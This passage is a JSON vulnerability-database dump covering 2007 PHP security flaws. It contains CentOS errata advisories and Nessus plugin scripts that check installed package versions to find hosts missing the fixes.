rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-12T14:44:58", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0155\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285) \r\n\r\nA flaw was found in the way PHP's unserialize() function processed data. If\r\na remote attacker was able to pass arbitrary data to PHP's unserialize()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1286)\r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker was able to pass arbitrary data to PHP's session_decode()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1711)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013669.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013672.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013677.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013678.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013679.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013680.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013682.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013683.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0155.html", "modified": "2007-04-17T09:40:12", "published": "2007-04-16T16:16:21", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013669.html", "id": "CESA-2007:0155", "title": "php security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-10-03T18:24:42", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0153\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013694.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013695.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0153.html", "modified": "2007-04-21T13:47:12", "published": "2007-04-21T13:47:06", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013694.html", "id": "CESA-2007:0153", "title": "php security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-01-25T01:01:51", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0154-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way PHP's unserialize() function processes data. If\r\na remote attacker is able to pass arbitrary data to PHP's unserialize()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1286)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker is able to pass arbitrary data to PHP's session_decode()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1711)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013681.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2007-04-17T01:50:13", "published": "2007-04-17T01:50:13", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013681.html", "id": "CESA-2007:0154-01", "title": "php security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:16:24", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:0155 :\n\nUpdated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2007-0155.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67471", "title": "Oracle Linux 3 / 4 : php (ELSA-2007-0155)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0155 and \n# Oracle Linux Security Advisory ELSA-2007-0155 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67471);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0155\");\n\n script_name(english:\"Oracle Linux 3 / 4 : php (ELSA-2007-0155)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0155 :\n\nUpdated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-April/000118.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-April/000121.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:16", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-04-19T00:00:00", "id": "REDHAT-RHSA-2007-0155.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25068", "title": "RHEL 3 / 4 : php (RHSA-2007:0155)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0155. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25068);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0155\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2007:0155)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0155\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif 